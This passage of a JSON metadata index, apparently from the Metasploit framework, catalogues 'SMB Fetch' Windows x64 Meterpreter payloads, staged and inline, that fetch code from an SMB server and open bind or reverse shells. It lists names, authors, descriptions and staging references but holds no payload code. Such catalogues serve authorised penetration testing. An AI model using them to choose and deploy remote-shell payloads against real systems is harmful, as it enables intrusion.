"payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_http": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_https": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"UserExistsError",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_bind_named_pipe",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_bind_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_http": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_http",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_https": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_https",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
